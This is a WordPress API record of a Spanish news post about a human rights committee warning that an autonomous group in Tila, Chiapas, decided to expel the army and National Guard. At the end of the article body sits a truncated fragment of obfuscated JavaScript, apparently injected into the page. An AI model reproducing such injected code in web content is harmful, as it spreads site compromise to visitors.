{"id":16588,"date":"2024-07-09T03:00:45","date_gmt":"2024-07-09T03:00:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16588"},"modified":"2024-07-09T03:00:46","modified_gmt":"2024-07-09T03:00:46","slug":"alertan-en-tila-han-decidido-el-retiro-del-ejercito-mexicano-y-la-guardia-nacional","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16588","title":{"rendered":"Alertan en Tila, han decidido el retiro del Ej\u00e9rcito Mexicano y la Guardia Nacional"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"679\" height=\"452\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240708-WA0020.jpg\" alt=\"\" class=\"wp-image-16589\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240708-WA0020.jpg 679w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240708-WA0020-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240708-WA0020-310x205.jpg 310w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>8 de julio del 2024. SCLC.- El comit\u00e9 de Derechos Humanos Digna Ochoa, dio a conocer que en una reuni\u00f3n este fin de semana, integrantes del Grupo autodenominados &#8220;aut\u00f3nomos pertenecientes al CNI, decidieron la expulsi\u00f3n del Ej\u00e9rcito y Guardia Nacional del Ejido, Tila&#8221;.<\/p>\n\n\n\n<p>&#8220;La situaci\u00f3n de tensi\u00f3n persiste en Tila con las acciones y omisiones de todos los niveles del Gobierno de M\u00e9xico y sus fuerzas de seguridad, que no act\u00faan para desarticular a grupos delincuenciales y armados, aplicar la ley a los responsables de graves delitos y violaciones de Derechos Humanos&#8221;, suscriben.<br>Indican que de llegarse a dar el retiro de los elementos uniformados, se teme una escalada de violencia en los pr\u00f3ximos d\u00edas.<br>Como Comit\u00e9 Digna Ocho, se\u00f1alan que la materia de seguridad p\u00fablica &#8220;es una funci\u00f3n concurrente de conformidad con el art\u00edculo 21 de la Constituci\u00f3n, por lo que es responsabilidad de los gobiernos federal y estatal, y de conformidad con el p\u00e1rrafo noveno del art\u00edculo 59 de la Constituci\u00f3n del Estado de Chiapas&#8221;.<\/p>\n\n\n\n<p>Consideran urgente que se realicen las acciones y diligencias de inteligencia y b\u00fasqueda, para que se ejecuten las \u00f3rdenes de aprehensi\u00f3n hacia sujetos del grupo delincuencial de los aut\u00f3nomos, se desarticule a los grupos armados delincuenciales que act\u00faan en Tila y se garantice la seguridad e integridad de ejidatarios y de la poblaci\u00f3n en el poblado de Tila y sus anexos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 8 de julio del 2024. SCLC.- El comit\u00e9 de Derechos Humanos Digna Ochoa, dio a conocer que en una reuni\u00f3n este fin de semana, integrantes del Grupo autodenominados &#8220;aut\u00f3nomos pertenecientes al CNI, decidieron la expulsi\u00f3n del Ej\u00e9rcito y Guardia Nacional del Ejido, Tila&#8221;. &#8220;La situaci\u00f3n de tensi\u00f3n persiste en Tila con las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16589,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16588","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16588"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16588\/revisions"}],"predecessor-version":[{"id":16590,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16588\/revisions\/16590"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16589"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}